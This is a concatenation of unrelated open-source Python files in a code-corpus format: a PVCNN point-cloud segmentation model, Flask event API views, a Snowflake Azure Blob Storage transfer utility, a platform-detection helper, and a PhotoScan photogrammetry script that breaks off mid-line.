self.cfg.num_classes)) m_softmax = torch.nn.Softmax(dim=-1) results = m_softmax(results) results = results.cpu().data.numpy() probs = np.reshape(results, [-1, self.cfg.num_classes]) pred_l = np.argmax(probs, 1) return {'predict_labels': pred_l, 'predict_scores': probs} def get_loss(self, sem_seg_loss, results, inputs, device): """Calculate the loss on output of the model. Attributes: sem_seg_loss: Object of type `SemSegLoss`. results: Output of the model. inputs: Input of the model. device: device(cpu or cuda). Returns: Returns loss, labels and scores. 
""" cfg = self.cfg labels = inputs['data']['label'].reshape(-1,) results = results.reshape(-1, results.shape[-1]) scores, labels = filter_valid_label(results, labels, cfg.num_classes, cfg.ignored_label_inds, device) loss = sem_seg_loss.weighted_CrossEntropyLoss(scores, labels) return loss, labels, scores def get_optimizer(self, cfg_pipeline): optimizer = torch.optim.Adam(self.parameters(), **cfg_pipeline.optimizer) scheduler = torch.optim.lr_scheduler.ExponentialLR( optimizer, cfg_pipeline.scheduler_gamma) return optimizer, scheduler MODEL._register_module(PVCNN, 'torch') class SE3d(nn.Module): """Extra Sequential Dense layers to be used to increase model complexity. """ def __init__(self, channel, reduction=8): """Constructor for SE3d module. Args: channel: Number of channels in the input layer. reduction: Factor of channels in second layer. """ super().__init__() self.fc = nn.Sequential( nn.Linear(channel, channel // reduction, bias=False), nn.ReLU(inplace=True), nn.Linear(channel // reduction, channel, bias=False), nn.Sigmoid()) def forward(self, inputs): """Forward call for SE3d Args: inputs: Input features. Returns: Transformed features. """ return inputs * self.fc(inputs.mean(-1).mean(-1).mean(-1)).view( inputs.shape[0], inputs.shape[1], 1, 1, 1) def _linear_bn_relu(in_channels, out_channels): """Layer combining Linear, BatchNorm and ReLU Block.""" return nn.Sequential(nn.Linear(in_channels, out_channels), nn.BatchNorm1d(out_channels), nn.ReLU(True)) def create_mlp_components(in_channels, out_channels, classifier=False, dim=2, width_multiplier=1): """Creates multiple layered components. For each output channel, it creates Dense layers with Dropout. Args: in_channels: Number of input channels. out_channels: Number of output channels. classifier: Whether the layer is classifier(appears at the end). dim: Dimension width_multiplier: factor by which neurons expands in intermediate layers. Returns: A List of layers. """ r = width_multiplier if dim == 1: block = _linear_bn_relu else: block = SharedMLP if not isinstance(out_channels, (list, tuple)): out_channels = [out_channels] if len(out_channels) == 0 or (len(out_channels) == 1 and out_channels[0] is None): return nn.Sequential(), in_channels, in_channels layers = [] for oc in out_channels[:-1]: if oc < 1: layers.append(nn.Dropout(oc)) else: oc = int(r * oc) layers.append(block(in_channels, oc)) in_channels = oc if dim == 1: if classifier: layers.append(nn.Linear(in_channels, out_channels[-1])) else: layers.append( _linear_bn_relu(in_channels, int(r * out_channels[-1]))) else: if classifier: layers.append(nn.Conv1d(in_channels, out_channels[-1], 1)) else: layers.append(SharedMLP(in_channels, int(r * out_channels[-1]))) return layers, out_channels[-1] if classifier else int(r * out_channels[-1]) def create_pointnet_components(blocks, in_channels, with_se=False, normalize=True, eps=1e-6, width_multiplier=1, voxel_resolution_multiplier=1): """Creates pointnet components. For each output channel, it comprises of PVConv or SharedMLP layers. Args: blocks: list of (out_channels, num_blocks, voxel_resolution). in_channels: Number of input channels. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization. width_multiplier: factor by which neurons expands in intermediate layers. voxel_resolution_multiplier: Factor by which voxel resolution expands. 
Returns: A List of layers, input_channels, and concat_channels """ r, vr = width_multiplier, voxel_resolution_multiplier layers, concat_channels = [], 0 for out_channels, num_blocks, voxel_resolution in blocks: out_channels = int(r * out_channels) if voxel_resolution is None: block = SharedMLP else: block = functools.partial(PVConv, kernel_size=3, resolution=int(vr * voxel_resolution), with_se=with_se, normalize=normalize, eps=eps) for _ in range(num_blocks): layers.append(block(in_channels, out_channels)) in_channels = out_channels concat_channels += out_channels return layers, in_channels, concat_channels class SharedMLP(nn.Module): """SharedMLP Module, comprising Conv2d, BatchNorm and ReLU blocks.""" def __init__(self, in_channels, out_channels, dim=1): """Constructor for SharedMLP Block. Args: in_channels: Number of input channels. out_channels: Number of output channels. dim: Input dimension """ super().__init__() if dim == 1: conv = nn.Conv1d bn = nn.BatchNorm1d elif dim == 2: conv = nn.Conv2d bn = nn.BatchNorm2d else: raise ValueError if not isinstance(out_channels, (list, tuple)): out_channels = [out_channels] layers = [] for oc in out_channels: layers.extend([ conv(in_channels, oc, 1), bn(oc), nn.ReLU(True), ]) in_channels = oc self.layers = nn.Sequential(*layers) def forward(self, inputs): """Forward pass for SharedMLP Args: inputs: features or a list of features. Returns: Transforms first features in a list. """ if isinstance(inputs, (list, tuple)): return (self.layers(inputs[0]), *inputs[1:]) else: return self.layers(inputs) class PVConv(nn.Module): """Point Voxel Convolution module. Consisting of 3D Convolutions for voxelized pointcloud, and SharedMLP blocks for point features. """ def __init__(self, in_channels, out_channels, kernel_size, resolution, with_se=False, normalize=True, eps=1e-6): """Constructor for PVConv module. Args: in_channels: Number of input channels. out_channels: Number of output channels. kernel_size: kernel size for Conv3D. resolution: Resolution of the voxel grid. with_se: Whether to use extra dense layers in each block. normalize: Whether to normalize pointcloud before voxelization. eps: Epsilon for voxelization. """ super().__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size self.resolution = resolution self.voxelization = Voxelization(resolution, normalize=normalize, eps=eps) voxel_layers = [ nn.Conv3d(in_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=1e-4), nn.LeakyReLU(0.1, True), nn.Conv3d(out_channels, out_channels, kernel_size, stride=1, padding=kernel_size // 2), nn.BatchNorm3d(out_channels, eps=1e-4), nn.LeakyReLU(0.1, True), ] if with_se: voxel_layers.append(SE3d(out_channels)) self.voxel_layers = nn.Sequential(*voxel_layers) self.point_features = SharedMLP(in_channels, out_channels) def forward(self, inputs): """Forward pass for PVConv. Args: inputs: tuple of features and coordinates. Returns: Fused features consists of point features and voxel_features. """ features, coords = inputs voxel_features, voxel_coords = self.voxelization(features, coords) voxel_features = self.voxel_layers(voxel_features) voxel_features = trilinear_devoxelize(voxel_features, voxel_coords, self.resolution, self.training) fused_features = voxel_features + self.point_features(features) return fused_features, coords def avg_voxelize(feat, coords, r): """Voxelize points and returns a voxel_grid with mean of features lying in same voxel. 
    Args:
        feat: Input features (B, C, N).
        coords: Input coordinates (B, 3, N).
        r (int): Resolution of voxel grid.

    Returns:
        voxel grid (B, C, r, r, r)
    """
    coords = coords.to(torch.int64)
    batch_size = feat.shape[0]
    dim = feat.shape[1]
    grid = torch.zeros((batch_size, dim, r, r, r)).to(feat.device)
    batch_id = torch.from_numpy(np.arange(batch_size).reshape(-1, 1)).to(
        feat.device)
    # Flatten each (batch, x, y, z) voxel index into a single scatter index.
    hash_idx = batch_id * r * r * r + coords[:, 0, :] * r * r + coords[:, 1, :] * r + coords[:, 2, :]
    hash_idx = hash_idx.reshape(-1,).to(feat.device)
    for i in range(0, dim):
        grid_ = torch.zeros(batch_size * r * r * r,
                            device=feat.device).scatter_add_(
                                0, hash_idx,
                                feat[:, i, :].reshape(-1,)).reshape(
                                    batch_size, r, r, r)
        grid[:, i] = grid_

    count = torch.zeros(batch_size * r * r * r,
                        device=feat.device).scatter_add_(
                            0, hash_idx,
                            torch.ones_like(feat[:, 0, :].reshape(
                                -1,))).reshape(batch_size, 1, r, r,
                                               r).clamp(min=1)
    grid = grid / count

    return grid


class Voxelization(nn.Module):
    """Voxelization module.

    Normalize the coordinates and
    returns voxel_grid with mean of features
    lying in same voxel.
    """

    def __init__(self, resolution, normalize=True, eps=1e-6):
        """Constructor of Voxelization module.

        Args:
            resolution (int): Resolution of the voxel grid.
            normalize (bool): Whether to normalize coordinates.
            eps (float): Small epsilon to avoid nan.
        """
        super().__init__()
        self.r = int(resolution)
        self.normalize = normalize
        self.eps = eps

    def forward(self, features, coords):
        """Forward pass for Voxelization.

        Args:
            features: Input features.
            coords: Input coordinates.

        Returns:
            Voxel grid of features (B, C, r, r, r)
        """
        coords = coords.detach()
        norm_coords = coords - coords.mean(2, keepdim=True)
        if self.normalize:
            norm_coords = norm_coords / (norm_coords.norm(
                dim=1, keepdim=True).max(dim=2, keepdim=True).values * 2.0 +
                                         self.eps) + 0.5
        else:
            norm_coords = (norm_coords + 1) / 2.0
        norm_coords = torch.clamp(norm_coords * self.r, 0, self.r - 1)
        vox_coords = torch.round(norm_coords).to(torch.int32)
        return avg_voxelize(features, vox_coords, self.r), norm_coords

    def extra_repr(self):
        """Extra representation of module."""
        return 'resolution={}{}'.format(
            self.r, ', normalized eps = {}'.format(self.eps)
            if self.normalize else '')
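
# Tiny worked example for avg_voxelize (kept as a comment because this
# module relies on relative imports and is not meant to run standalone).
# Two points falling into the same voxel are averaged channel-wise:
#
#   feats  = torch.tensor([[[1.0, 3.0], [2.0, 4.0]]])   # (B=1, C=2, N=2)
#   coords = torch.tensor([[[0, 0], [0, 0], [0, 0]]])   # both points -> voxel (0, 0, 0)
#   grid = avg_voxelize(feats, coords, 2)
#   grid[0, :, 0, 0, 0]                                 # -> tensor([2., 3.])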
StarcoderdataPython
3225054
<gh_stars>1-10 from datetime import timedelta from webargs import fields from . import BaseView, use_args, use_kwargs from ..models.event import Event as EventModel from ..schemas.event import Event as EventSchema, EventMatch from .utils import get_or_404 eventlist_args = { "fromdate": fields.Date(required=False), "todate": fields.Date(required=False), } class EventListView(BaseView): # pylint: disable=no-self-use route_base = "/events" @use_kwargs(eventlist_args, location="query") def get(self, fromdate, todate): if fromdate and todate: matches = EventModel.get_between(fromdate, todate) return EventMatch.jsonify(matches), 200 objects = EventModel.query_all().all() return EventSchema.jsonify(objects), 200 @use_args(EventSchema(), location="json") def post(self, args): obj = EventModel.create(**args) return EventSchema.jsonify(obj), 201 class EventItemView(BaseView): # pylint: disable=no-self-use route_base = "/events/<int:id>" def get(self, id): # pylint: disable=redefined-builtin obj = get_or_404(EventModel, id) return EventSchema.jsonify(obj), 200 @use_args(EventSchema(), location="json") def put(self, args, id): # pylint: disable=redefined-builtin obj = get_or_404(EventModel, id) obj.update(**args) return EventSchema.jsonify(obj), 200 def delete(self, id): # pylint: disable=redefined-builtin obj = get_or_404(EventModel, id) obj.delete() return "", 204 repeat_args = { "days": fields.Int(required=True), } class EventRepeatView(BaseView): # pylint: disable=no-self-use route_base = "/events/<int:id>/repeat" @use_kwargs(repeat_args, location="json") def post(self, id, days): # pylint: disable=redefined-builtin obj = get_or_404(EventModel, id) if obj.repeat is not None: return "", 400 dt = obj.date + timedelta(days=days) new_obj = EventModel.create(name=obj.name, icon=obj.icon, date=dt) return EventSchema.jsonify(new_obj), 201
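
# Example requests these views are intended to serve (paths assume the
# route_base values above; the payload fields follow EventSchema and are
# illustrative):
#
#   GET  /events?fromdate=2021-01-01&todate=2021-01-31  -> matches in range
#   POST /events           {"name": "Birthday", ...}    -> 201, new event
#   PUT  /events/1         {...}                        -> 200, updated event
#   POST /events/1/repeat  {"days": 7}                  -> 201, copy at date + 7 days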
StarcoderdataPython
197042
#
# Copyright (c) 2012-2020 Snowflake Computing Inc. All rights reserved.
#

from __future__ import division

import json
import os
from collections import namedtuple
from logging import getLogger

from .constants import HTTP_HEADER_VALUE_OCTET_STREAM, SHA256_DIGEST, FileHeader, ResultStatus
from .encryption_util import EncryptionMetadata

use_new_azure_api = False

try:
    from azure.core.exceptions import ResourceNotFoundError, HttpResponseError
    from azure.storage.blob import BlobServiceClient, ContentSettings, ExponentialRetry
    use_new_azure_api = True
except ImportError:
    import logging

    import requests
    from azure.common import AzureHttpError, AzureMissingResourceHttpError
    from azure.storage.blob import BlockBlobService
    from azure.storage.blob.models import ContentSettings
    from azure.storage.common._http.httpclient import HTTPResponse, _HTTPClient
    from azure.storage.common._serialization import _get_data_bytes_or_stream_only
    from azure.storage.common.retry import ExponentialRetry

    class RawBodyReadingClient(_HTTPClient):
        """Class that allows Azure to download files with content-encoding=gzip compressed.

        For more information see: https://github.com/Azure/azure-storage-python/issues/509.
        This client overrides the default HTTP client and downloads uncompressed.
        This workaround was provided by Microsoft.
        """

        def perform_request(self, request):
            """Sends an HTTPRequest to Azure Storage and returns an HTTPResponse.

            If the response code indicates an error, raise an HTTPError.
            """
            # Verify whether the body is in bytes or a file-like/stream object
            if request.body:
                request.body = _get_data_bytes_or_stream_only('request.body', request.body)

            # Construct the URI
            uri = self.protocol.lower() + '://' + request.host + request.path

            # Send the request
            response = self.session.request(request.method,
                                            uri,
                                            params=request.query,
                                            headers=request.headers,
                                            data=request.body or None,
                                            timeout=self.timeout,
                                            proxies=self.proxies,
                                            stream=True)

            # Parse the response
            status = int(response.status_code)
            response_headers = {}
            for key, name in response.headers.items():
                # Preserve the case of metadata
                if key.lower().startswith('x-ms-meta-'):
                    response_headers[key] = name
                else:
                    response_headers[key.lower()] = name

            wrap = HTTPResponse(status, response.reason, response_headers, response.raw.read())
            response.close()

            return wrap

logger = getLogger(__name__)

"""
Azure Location: Azure container name + path
"""
AzureLocation = namedtuple(
    "AzureLocation", [
        "container_name",  # Azure container name
        "path"  # Azure path name
    ])


class SnowflakeAzureUtil(object):
    """Azure Utility class."""
    # max_connections works over this size
    DATA_SIZE_THRESHOLD = 67108864

    @staticmethod
    def create_client(stage_info, use_accelerate_endpoint: bool = False):
        """Creates a client object with a stage credential.

        Args:
            stage_info: Information about the stage.
            use_accelerate_endpoint: Not used for the Azure client.

        Returns:
            The client to communicate with Azure Blob Storage.
""" stage_credentials = stage_info['creds'] sas_token = stage_credentials['AZURE_SAS_TOKEN'] if sas_token and sas_token.startswith('?'): sas_token = sas_token[1:] end_point = stage_info['endPoint'] if end_point.startswith('blob.'): end_point = end_point[len('blob.'):] if use_new_azure_api: client = BlobServiceClient( account_url="https://{}.blob.{}".format( stage_info['storageAccount'], end_point ), credential=sas_token) client._config.retry_policy = ExponentialRetry( initial_backoff=1, increment_base=2, max_attempts=60, random_jitter_range=2 ) else: client = BlockBlobService(account_name=stage_info['storageAccount'], sas_token=sas_token, endpoint_suffix=end_point) client._httpclient = RawBodyReadingClient(session=requests.session(), protocol="https", timeout=2000) client.retry = ExponentialRetry( initial_backoff=1, increment_base=2, max_attempts=60, random_jitter_range=2).retry return client @staticmethod def extract_container_name_and_path(stage_location): stage_location = os.path.expanduser(stage_location) container_name = stage_location path = '' # split stage location as bucket name and path if '/' in stage_location: container_name = stage_location[0:stage_location.index('/')] path = stage_location[stage_location.index('/') + 1:] if path and not path.endswith('/'): path += '/' return AzureLocation( container_name=container_name, path=path) @staticmethod def get_file_header(meta, filename): """Gets Azure file properties.""" client = meta['client'] azure_logger = None backup_logging_level = None if not use_new_azure_api: azure_logger = logging.getLogger('azure.storage.common.storageclient') backup_logging_level = azure_logger.level # Critical (50) is the highest level, so we need to set it to something higher to silence logging message azure_logger.setLevel(60) azure_location = SnowflakeAzureUtil.extract_container_name_and_path( meta['stage_info']['location']) if use_new_azure_api: try: # HTTP HEAD request blob = client.get_blob_client(azure_location.container_name, azure_location.path + filename) blob_details = blob.get_blob_properties() except ResourceNotFoundError: meta['result_status'] = ResultStatus.NOT_FOUND_FILE return FileHeader( digest=None, content_length=None, encryption_metadata=None ) except HttpResponseError as err: logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format( status_code=err.status_code, ex_representation=str(err) )) if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err): logger.debug("AZURE Token expired. Renew and retry") meta['result_status'] = ResultStatus.RENEW_TOKEN else: logger.debug('Unexpected Azure error: %s' 'container: %s, path: %s', err, azure_location.container_name, azure_location.path) meta['result_status'] = ResultStatus.ERROR return else: try: # HTTP HEAD request blob = client.get_blob_properties(azure_location.container_name, azure_location.path + filename) except AzureMissingResourceHttpError: meta['result_status'] = ResultStatus.NOT_FOUND_FILE return FileHeader( digest=None, content_length=None, encryption_metadata=None ) except AzureHttpError as err: logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format( status_code=err.status_code, ex_representation=str(err) )) if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err): logger.debug("AZURE Token expired. 
Renew and retry")
                meta['result_status'] = ResultStatus.RENEW_TOKEN
            else:
                logger.debug('Unexpected Azure error: %s, '
                             'container: %s, path: %s',
                             err, azure_location.container_name,
                             azure_location.path)
                meta['result_status'] = ResultStatus.ERROR
            return
        finally:
            azure_logger.setLevel(backup_logging_level)

        meta['result_status'] = ResultStatus.UPLOADED
        if use_new_azure_api:
            encryptiondata = json.loads(
                blob_details.metadata.get('encryptiondata', 'null'))
            encryption_metadata = EncryptionMetadata(
                key=encryptiondata['WrappedContentKey']['EncryptedKey'],
                iv=encryptiondata['ContentEncryptionIV'],
                matdesc=blob_details.metadata['matdesc'],
            ) if encryptiondata else None

            return FileHeader(
                digest=blob_details.metadata.get('sfcdigest'),
                content_length=blob_details.size,
                encryption_metadata=encryption_metadata
            )
        else:
            encryptiondata = json.loads(
                blob.metadata.get('encryptiondata', 'null'))
            encryption_metadata = EncryptionMetadata(
                key=encryptiondata['WrappedContentKey']['EncryptedKey'],
                iv=encryptiondata['ContentEncryptionIV'],
                matdesc=blob.metadata['matdesc'],
            ) if encryptiondata else None

            return FileHeader(
                digest=blob.metadata.get('sfcdigest'),
                content_length=blob.properties.content_length,
                encryption_metadata=encryption_metadata
            )

    @staticmethod
    def _detect_azure_token_expire_error(err):
        if err.status_code != 403:
            return False
        errstr = str(err)
        return "Signature not valid in the specified time frame" in errstr or \
               "Server failed to authenticate the request." in errstr

    @staticmethod
    def upload_file(data_file, meta, encryption_metadata, max_concurrency):
        azure_metadata = {
            'sfcdigest': meta[SHA256_DIGEST],
        }
        if encryption_metadata:
            azure_metadata.update({
                'encryptiondata': json.dumps({
                    'EncryptionMode': 'FullBlob',
                    'WrappedContentKey': {
                        'KeyId': '<KEY>',
                        'EncryptedKey': encryption_metadata.key,
                        'Algorithm': 'AES_CBC_256'
                    },
                    'EncryptionAgent': {
                        'Protocol': '1.0',
                        'EncryptionAlgorithm': 'AES_CBC_128',
                    },
                    'ContentEncryptionIV': encryption_metadata.iv,
                    'KeyWrappingMetadata': {
                        'EncryptionLibrary': 'Java 5.3.0'
                    }
                }),
                'matdesc': encryption_metadata.matdesc
            })
        azure_location = SnowflakeAzureUtil.extract_container_name_and_path(
            meta['stage_info']['location'])
        path = azure_location.path + meta['dst_file_name'].lstrip('/')

        client = meta['client']
        callback = None
        if meta['put_azure_callback']:
            callback = meta['put_azure_callback'](
                data_file,
                os.path.getsize(data_file),
                output_stream=meta['put_callback_output_stream'],
                show_progress_bar=meta['show_progress_bar'])

        if use_new_azure_api:
            def azure_callback(response):
                current = response.context['upload_stream_current']
                total = response.context['data_stream_total']
                if current is not None:
                    callback(current)
                    logger.debug("data transfer progress from sdk callback. "
                                 "current: %s, total: %s", current, total)

            try:
                blob = client.get_blob_client(
                    azure_location.container_name,
                    path
                )
                with open(data_file, 'rb') as upload_f:
                    blob.upload_blob(
                        upload_f,
                        metadata=azure_metadata,
                        overwrite=True,
                        max_concurrency=max_concurrency,
                        raw_response_hook=azure_callback if meta['put_azure_callback'] else None,
                        content_settings=ContentSettings(
                            content_type=HTTP_HEADER_VALUE_OCTET_STREAM,
                            content_encoding='utf-8',
                        )
                    )
            except HttpResponseError as err:
                logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format(
                    status_code=err.status_code,
                    ex_representation=str(err)
                ))
                if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err):
                    logger.debug("AZURE Token expired. Renew and retry")
                    meta['result_status'] = ResultStatus.RENEW_TOKEN
                else:
                    meta['last_error'] = err
                    meta['result_status'] = ResultStatus.NEED_RETRY
                return
        else:
            def azure_callback(current, total):
                callback(current)
                logger.debug("data transfer progress from sdk callback. "
                             "current: %s, total: %s", current, total)

            try:
                client.create_blob_from_path(
                    azure_location.container_name,
                    path,
                    data_file,
                    progress_callback=azure_callback if meta['put_azure_callback'] else None,
                    metadata=azure_metadata,
                    max_connections=max_concurrency,
                    content_settings=ContentSettings(
                        content_type=HTTP_HEADER_VALUE_OCTET_STREAM,
                        content_encoding='utf-8'
                    )
                )
            except AzureHttpError as err:
                logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format(
                    status_code=err.status_code,
                    ex_representation=str(err)
                ))
                if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err):
                    logger.debug("AZURE Token expired. Renew and retry")
                    meta['result_status'] = ResultStatus.RENEW_TOKEN
                else:
                    meta['last_error'] = err
                    meta['result_status'] = ResultStatus.NEED_RETRY
                return

        logger.debug('DONE putting a file')
        meta['dst_file_size'] = meta['upload_size']
        meta['result_status'] = ResultStatus.UPLOADED

    # Compared with s3, azure hasn't experienced OpenSSL.SSL.SysCallError,
    # so we will add logic to catch it only when it happens
    @staticmethod
    def _native_download_file(meta, full_dst_file_name, max_concurrency):
        azure_location = SnowflakeAzureUtil.extract_container_name_and_path(
            meta['stage_info']['location'])
        path = azure_location.path + meta['src_file_name'].lstrip('/')
        client = meta['client']

        callback = None
        if meta['get_azure_callback']:
            callback = meta['get_azure_callback'](
                meta['src_file_name'],
                meta['src_file_size'],
                output_stream=meta['get_callback_output_stream'],
                show_progress_bar=meta['show_progress_bar'])

        if use_new_azure_api:
            def azure_callback(response):
                current = response.context['download_stream_current']
                total = response.context['data_stream_total']
                if current is not None:
                    callback(current)
                    logger.debug("data transfer progress from sdk callback. "
                                 "current: %s, total: %s", current, total)

            try:
                blob = client.get_blob_client(
                    azure_location.container_name,
                    path
                )
                with open(full_dst_file_name, 'wb') as download_f:
                    download = blob.download_blob(
                        max_concurrency=max_concurrency,
                        raw_response_hook=azure_callback if meta['get_azure_callback'] else None,
                    )
                    download.readinto(download_f)
            except HttpResponseError as err:
                logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format(
                    status_code=err.status_code,
                    ex_representation=str(err)
                ))
                if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err):
                    logger.debug("AZURE Token expired. Renew and retry")
                    meta['result_status'] = ResultStatus.RENEW_TOKEN
                else:
                    meta['last_error'] = err
                    meta['result_status'] = ResultStatus.NEED_RETRY
                return
        else:
            def azure_callback(current, total):
                callback(current)
                logger.debug("data transfer progress from sdk callback. "
                             "current: %s, total: %s", current, total)

            try:
                client.get_blob_to_path(
                    azure_location.container_name,
                    path,
                    full_dst_file_name,
                    progress_callback=azure_callback if meta['get_azure_callback'] else None,
                    max_connections=max_concurrency
                )
            except AzureHttpError as err:
                logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format(
                    status_code=err.status_code,
                    ex_representation=str(err)
                ))
                if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err):
                    logger.debug("AZURE Token expired. Renew and retry")
                    meta['result_status'] = ResultStatus.RENEW_TOKEN
                else:
                    meta['last_error'] = err
                    meta['result_status'] = ResultStatus.NEED_RETRY
                return

        meta['result_status'] = ResultStatus.DOWNLOADED
StarcoderdataPython
1786110
<gh_stars>100-1000 # *************************************************************************************** # Title: LabAdvComp/parcel # Author: <NAME> # Date: May 26, 2016 # Code version: 0.1.13 # Availability: https://github.com/LabAdvComp/parcel # *************************************************************************************** import platform from termcolor import colored as _colored OS_WINDOWS = False OS_LINUX = False OS_OSX = False # Are we running on windows? if platform.system() == "Windows": OS_WINDOWS = True elif platform.system() == "Darwin": OS_OSX = True elif platform.system() == "Linux": OS_LINUX = True # Are we running on windows? if OS_WINDOWS: from threading import Thread as Process else: # Assume a posix system from multiprocessing import Process def colored(text, color): if OS_WINDOWS: return text else: return _colored(text, color)
StarcoderdataPython
156107
<gh_stars>0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Creation date: 13 February 2020 Last modified: 11 December 2020 Author: <NAME>; <EMAIL> Affiliation: Helmholtz Zentrum Geesthacht Collaborators: <NAME> - Aarhus University Description: This python script is written for Agisoft PhotoScan Professional v1.4.4 Linux Ubuntu computer with 128 GB RAM and a Quadro P1000 CUDA graphics card with 5 compute nodes @1480 MHz, 4006 MB Note: PhotoScan has been replaced by MetaShape Carlson_Iceberg_PhotoScan_GS_DC_distv1.py performs gradual selection and buils the dense point cloud. During the gradual selection process, thresholds for the reconstruction uncertainty, projection accuracy, and reprojection error are used to identify and remove inaccurate points in the sparse point cloud. This script duplicates the chunk when removing points during each step so the effects of each metric on the sparse point cloud can be evaluated. The user provides an initial threshold, which is adjusted through an iterative process that removes as many inaccurate points as possible, while still retaining a sufficient number to compute the dense point cloud. The mesh model can also be computed at this point, if desired. This script was developed using the Agisoft python documentation, forums and from a script by Yu-Hsuan Tu https://github.com/dobedobedo/PhotoScan-Workflow/blob/master/PhotoScan_Workflow.py For more on Agisoft PhotoScan workflow- see Mayer et al. (2018) A comprehensive workflow to process UAV images for efficient production of accurate Geo-information. IX National Conference on Cartography and Geodesy, Lisbon Portugal. https://www.researchgate.net/profile/Thomas_Kersten/publication/328841797_A_Comprehensive_Workflow_to_Process_UAV_Images_for_the_Efficient_Production_of_Accurate_Geo-information/links/5be5f929a6fdcc3a8dcb181a/A-Comprehensive-Workflow-to-Process-UAV-Images-for-the-Efficient-Production-of-Accurate-Geo-information.pdf """ import PhotoScan, time import os.path from datetime import datetime # user specified parameters # # reconstruction uncertainty threshold ru_init_threshold = 15 # Dense cloud quality DenseQual = PhotoScan.HighQuality # Depth filter mode DepthFilterMode = PhotoScan.AggressiveFiltering # Model # Surface type SurfType = PhotoScan.SurfaceType.Arbitrary # Interpolation ModInterp = PhotoScan.Interpolation.EnabledInterpolation # FaceCount ModFaceCount = PhotoScan.FaceCount.HighFaceCount # Model source data ModSource = PhotoScan.DataSource.DepthMapsData def ReduceError_RE(chunk, init_threshold = 0.5): # This is used to reduce error based on reprojection error #init_threshold = re_init_threshold tie_points = chunk.point_cloud fltr = PhotoScan.PointCloud.Filter() fltr.init(chunk, PhotoScan.PointCloud.Filter.ReprojectionError) threshold = init_threshold while fltr.max_value > init_threshold : fltr.selectPoints(threshold) nselected = len([p for p in tie_points.points if p.selected]) if nselected >= len(tie_points.points) / 10: fltr.resetSelection() threshold += 0.01 continue tie_points.removeSelectedPoints() chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy=True, fit_b1=True, fit_b2=True, fit_k1=True, fit_k2=True, fit_k3=True, fit_k4=True, fit_p1=True, fit_p2=True, fit_p3=True, fit_p4=True, adaptive_fitting=False) fltr.init(chunk, PhotoScan.PointCloud.Filter.ReprojectionError) threshold = init_threshold def ReduceError_RU(chunk, ru_init_threshold): # This is used to reduce error based on reconstruction uncertainty init_threshold = ru_init_threshold tie_points = chunk.point_cloud 
fltr = PhotoScan.PointCloud.Filter() fltr.init(chunk, PhotoScan.PointCloud.Filter.ReconstructionUncertainty) threshold = init_threshold while fltr.max_value > ru_init_threshold: fltr.selectPoints(threshold) nselected = len([p for p in tie_points.points if p.selected]) if nselected >= len(tie_points.points) / 2 and threshold <= 50: fltr.resetSelection() threshold += 1 continue tie_points.removeSelectedPoints() chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy=True, fit_b1=False, fit_b2=False, fit_k1=True, fit_k2=True, fit_k3=True, fit_k4=False, fit_p1=True, fit_p2=True, fit_p3=False, fit_p4=False, adaptive_fitting=False) fltr.init(chunk, PhotoScan.PointCloud.Filter.ReconstructionUncertainty) threshold = init_threshold def ReduceError_PA(chunk, init_threshold=10.0): # This is used to reduce error based on projection accuracy tie_points = chunk.point_cloud fltr = PhotoScan.PointCloud.Filter() fltr.init(chunk, PhotoScan.PointCloud.Filter.ProjectionAccuracy) threshold = init_threshold while fltr.max_value > 10.0: fltr.selectPoints(threshold) nselected = len([p for p in tie_points.points if p.selected]) if nselected >= len(tie_points.points) / 2 and threshold <= 12.0: fltr.resetSelection() threshold += 0.1 continue tie_points.removeSelectedPoints() chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy=True, fit_b1=False, fit_b2=False, fit_k1=True, fit_k2=True, fit_k3=True, fit_k4=False, fit_p1=True, fit_p2=True, fit_p3=False, fit_p4=False, adaptive_fitting=False) fltr.init(chunk, PhotoScan.PointCloud.Filter.ProjectionAccuracy) threshold = init_threshold # This is to tighten tie point accuracy value chunk.tiepoint_accuracy = 0.1 chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy=True, fit_b1=True, fit_b2=True, fit_k1=True, fit_k2=True, fit_k3=True, fit_k4=True, fit_p1=True, fit_p2=True, fit_p3=True, fit_p4=True, adaptive_fitting=False) def BuildDenseCloud(chunk, Quality, FilterMode): chunk.buildDepthMaps(quality=Quality, filter=FilterMode, reuse_depth=False) chunk.buildDenseCloud(point_colors=True) def BuildModel(chunk,SurfType,ModInterp, ModFaceCount,ModSource): chunk.buildModel(surface=SurfType, interpolation=ModInterp, face_count=ModFaceCount, source=ModSource, vertex_colors=True) chunk.buildUV(mapping=PhotoScan.MappingMode.GenericMapping) chunk.buildTexture(blending=PhotoScan.MosaicBlending, size = 4096, fill_holes=True,ghosting_filter=True ) # EPSG:4326 Geodetic world coordinate system used by GPS/GNSS sat nav wgs_84 = PhotoScan.CoordinateSystem("EPSG::4326") # list of PhotoScan projects prj_dir = '/your/project/directory/' prj_list = ['your', 'list', 'of projects'] time2go = True tstart = datetime(2020,2,27,18,0,0) while not time2go: time.sleep(30) tdif = datetime.now() - tstart seconds = tdif.total_seconds() if seconds > 0: time2go = True # project loop for p in prj_list: fn = prj_dir + p if os.path.isfile(fn): doc = PhotoScan.app.document doc.open(fn) run1oc = doc.chunk # gradual selection - # reconstruction uncertainty - Mayer et al. (2018) suggest ru_init_threshold of 10, here we use 15 run1gsru = run1oc.copy() run1gsru.label = "run1-gs-ru" ReduceError_RU(run1gsru, ru_init_threshold) # projection accuracy - 